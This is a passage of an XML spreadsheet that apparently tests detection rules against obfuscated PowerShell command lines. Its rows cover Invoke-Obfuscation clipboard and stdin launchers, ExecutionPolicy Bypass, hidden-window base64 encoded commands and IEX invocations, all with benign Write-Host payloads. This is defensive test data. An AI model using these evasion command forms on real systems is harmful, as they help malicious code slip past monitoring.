          <t>powershell.exe -"NoProfile" -c "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H347" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I347" s="43" t="n"/>
      <c r="J347" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K347" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="n"/>
      <c r="B348" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C348" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D348" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E348" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop /"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H348" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I348" s="43" t="n"/>
      <c r="J348" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K348" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="n"/>
      <c r="B349" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C349" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D349" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E349" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nOpROFIle -"Command" "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H349" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I349" s="43" t="n"/>
      <c r="J349" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K349" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="n"/>
      <c r="B350" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C350" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D350" s="44" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E350" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H350" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I350" s="43" t="n"/>
      <c r="J350" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K350" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="n"/>
      <c r="B351" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C351" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D351" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E351" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F351" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G351" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H351" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K351" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="n"/>
      <c r="B352" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C352" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D352" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E352" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="43" t="n"/>
      <c r="J352" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K352" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="n"/>
      <c r="B353" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C353" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D353" s="44" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E353" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H353" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I353" s="43" t="n"/>
      <c r="J353" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K353" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="n"/>
      <c r="B354" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C354" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D354" s="44" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E354" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H354" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="44" t="n"/>
      <c r="J354" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K354" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="n"/>
      <c r="B355" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C355" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D355" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E355" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H355" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="44" t="n"/>
      <c r="J355" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K355" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C356" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D356" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E356" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /V:ON /C "set a=in&amp;&amp; set b=voke&amp;&amp; set c=!a!!b!&amp;&amp; echo !c! | powershell -"</t>
        </is>
      </c>
      <c r="F356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H356" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="44" t="n"/>
      <c r="J356" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K356" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C357" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D357" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E357" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXecUTionPoLiCY Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H357" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="44" t="n"/>
      <c r="J357" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="n"/>
      <c r="B358" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C358" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D358" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E358" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -COMmanD "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H358" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I358" s="44" t="n"/>
      <c r="J358" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K358" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="43" t="n"/>
      <c r="B359" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C359" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D359" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E359" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EXeCUTiOnpolIcy Bypass /"Command" "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H359" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I359" s="44" t="n"/>
      <c r="J359" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K359" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="n"/>
      <c r="B360" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C360" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D360" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E360" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="43" t="n"/>
      <c r="J360" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C361" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D361" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E361" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -"c" "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="44" t="n"/>
      <c r="J361" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C362" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D362" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E362" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="44" t="n"/>
      <c r="J362" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="n"/>
      <c r="B363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C363" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D363" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E363" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host "'Bypass Test'" | clip &amp; powershell -"c" IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="44" t="n"/>
      <c r="J363" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C364" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D364" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E364" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="43" t="n"/>
      <c r="J364" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C365" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D365" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E365" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="43" t="n"/>
      <c r="J365" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C366" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D366" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E366" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enC IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="44" t="n"/>
      <c r="J366" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="n"/>
      <c r="B367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C367" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D367" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E367" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENc IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I367" s="44" t="n"/>
      <c r="J367" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="368" ht="15.75" customHeight="1" s="42">
      <c r="A368" s="43" t="n"/>
      <c r="B368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C368" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D368" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E368" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"enc" IwoAJABzAD0AMQA7AGkAZQB4ACAAJABzAA==</t>
        </is>
      </c>
      <c r="F368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I368" s="43" t="n"/>
      <c r="J368" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="369" ht="15.75" customHeight="1" s="42">
      <c r="A369" s="43" t="n"/>
      <c r="B369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_encoded_cmd_patterns</t>
        </is>
      </c>
      <c r="C369" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Encoded Command Patterns</t>
        </is>
      </c>
      <c r="D369" s="44" t="inlineStr">
        <is>
          <t>b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c</t>
        </is>
      </c>
      <c r="E369" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" "JABzAD0AMQA7AGkAZQB4ACAAJABzAA=="</t>
        </is>
      </c>
      <c r="F369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I369" s="44" t="n"/>
      <c r="J369" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="370" ht="15.75" customHeight="1" s="42">
      <c r="A370" s="43" t="n"/>
      <c r="B370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_frombase64string</t>
        </is>
      </c>
      <c r="C370" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded FromBase64String Cmdlet</t>
        </is>
      </c>
      <c r="D370" s="44" t="inlineStr">
        <is>
          <t>fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c</t>
        </is>
      </c>
      <c r="E370" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[Convert]::FromBase64String('d2hvYW1p')\"</t>
        </is>
      </c>
      <c r="F370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I370" s="43" t="n"/>
      <c r="J370" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K370" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="371" ht="15.75" customHeight="1" s="42">
      <c r="A371" s="43" t="n"/>
      <c r="B371" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C371" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D371" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E371" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"WindowStyle" Hidden /"EncodedCommand" QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F371" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G371" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H371" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I371" s="43" t="n"/>
      <c r="J371" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K371" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="372" ht="15.75" customHeight="1" s="42">
      <c r="A372" s="43" t="n"/>
      <c r="B372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C372" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D372" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E372" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"WindowStyle" Hidden -enc QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I372" s="43" t="n"/>
      <c r="J372" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K372" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="373" ht="15.75" customHeight="1" s="42">
      <c r="A373" s="43" t="n"/>
      <c r="B373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_hidden_flag</t>
        </is>
      </c>
      <c r="C373" s="44" t="inlineStr">
        <is>
          <t>Malicious Base64 Encoded PowerShell Keywords in Command Lines</t>
        </is>
      </c>
      <c r="D373" s="44" t="inlineStr">
        <is>
          <t>f26c6093-6f14-4b12-800f-0fcb46f5ffd0</t>
        </is>
      </c>
      <c r="E373" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -wIndowsTyLe Hidden /"EncodedCommand" QgBpAFQAcwBBAGQATQBpAE4AIAAvAHQAcgBhAG4AcwBmAGUAcg==</t>
        </is>
      </c>
      <c r="F373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I373" s="43" t="n"/>
      <c r="J373" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K373" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="374" ht="15.75" customHeight="1" s="42">
      <c r="A374" s="43" t="n"/>
      <c r="B374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C374" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D374" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E374" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I374" s="44" t="n"/>
      <c r="J374" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K374" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="375" ht="15.75" customHeight="1" s="42">
      <c r="A375" s="43" t="n"/>
      <c r="B375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_iex</t>
        </is>
      </c>
      <c r="C375" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded IEX Cmdlet</t>
        </is>
      </c>
      <c r="D375" s="44" t="inlineStr">
        <is>
          <t>88f680b8-070e-402c-ae11-d2914f2257f1</t>
        </is>
      </c>
      <c r="E375" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" aQBlAHgAIAAgACAAIAAgACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0</t>
        </is>
      </c>
      <c r="F375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I375" s="44" t="n"/>
      <c r="J375" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K375" s="44" t="b">
